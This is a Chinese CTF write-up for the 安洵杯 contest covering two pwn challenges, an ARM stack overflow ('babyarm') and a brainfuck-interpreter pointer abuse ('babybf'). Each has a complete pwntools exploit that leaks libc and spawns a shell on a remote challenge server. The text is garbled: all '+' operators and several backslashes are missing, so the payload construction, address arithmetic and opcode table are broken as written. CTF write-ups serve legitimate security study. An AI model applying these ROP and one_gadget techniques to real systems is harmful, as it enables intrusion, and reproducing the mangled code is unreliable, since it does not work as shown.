安洵杯WP

2022-12-01 15:53:53 浏览数 (1)

太菜了,最后一个0解题不会,只会前两个简单的。

babyarm

Arm架构的栈溢出,先换表base64解密一下,可以解出来应该输入的字符串是s1mpl3Dec0d4r,然后就是32位的溢出,exp如下:

代码语言:javascript复制
from pwn import *

#io = process("./chall")
io = remote("47.108.29.107",10392)
elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

def input_pass():
    io.sendlineafter("msg> ","s1mpl3Dec0d4r")

def overflow(payload):
    io.sendlineafter("comment> ",payload)

read_got = elf.got["read"]
puts_plt = elf.plt["puts"]
#main_addr = elf.symbols["__libc_start_main"]
main_addr = 0x1050C
pop_r3_pc = 0x10464
pop_r4_r5_r6_r7 = 0x10cb0
mov_r0_r7 = 0x10ca0

input_pass()

payload = b'a'*(0x2c)   p32(pop_r4_r5_r6_r7)   p32(0xdeadbeef)*3   p32(read_got)   p32(0xdeadbeef)*3   p32(pop_r3_pc)   p32(puts_plt)   p32(mov_r0_r7)   p32(main_addr)*0x10

overflow(payload)

libc_base = u32(io.recv()[0:4])
libc_base = libc_base - libc.symbols["read"]
success("libc base is leaked ==> "   hex(libc_base))

sys_addr = libc_base   libc.symbols["system"]
bin_sh_addr = libc_base   next(libc.search(b'/bin/shx00'))

payload = b'a'*(0x2c)   p32(pop_r4_r5_r6_r7)   p32(0xdeadbeef)*3   p32(bin_sh_addr)   p32(0xdeadbeef)*3   p32(pop_r3_pc)   p32(sys_addr)   p32(mov_r0_r7)   p32(main_addr)*0x10

input_pass()
overflow(payload)

io.interactive()

babybf

brainfuck的解释器,brainfuck的操作格式为:

操作码

含义

>

ptr =1

<

ptr -= 1

(*ptr) = 1

-

(*ptr) -= 1

.

putchar(*ptr)

,

getchar(ptr)

操作的是rbp-0xA8,那么先用>来加,然后putchar输出__libc_start_main 231的地址,然后再通过getchar读入one_gadget即可,exp如下:

代码语言:javascript复制
from pwn import *
#io = process("./chall")
io = remote("47.108.29.107",10392)

elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

context.arch = "amd64"
context.log_level = "debug"

def length(leng):
    io.sendafter("len> ",str(leng))

def code(co):
    io.sendafter("code> ",co)

add = 0x3e # >
minus = 0x3c # <
ptr_add = 0x2b #  
ptr_minuns = 0x2d # -
putchar = 0x2e # .
getchar = 0x2c # ,
nop = 0x0

payload = p8(add)*0x58   p8(putchar)   (p8(add)   p8(putchar))*7
length(len(payload))
code(payload)
libc_base = u64(io.recvuntil("x7f")[-6:].ljust(8,b'x00')) - 231 - libc.symbols["__libc_start_main"]

success("libc base is leaked ==>"   hex(libc_base))

#ogg = libc_base   0x4f2a5
ogg = libc_base   0x4f302

payload=p8(add)*0x38   p8(getchar)   (p8(add)   p8(getchar))*7   p8(nop)

gdb.attach(io)
pause()

length(len(payload))
code(payload)

io.send(p64(ogg))

io.interactive()
arm

0 人点赞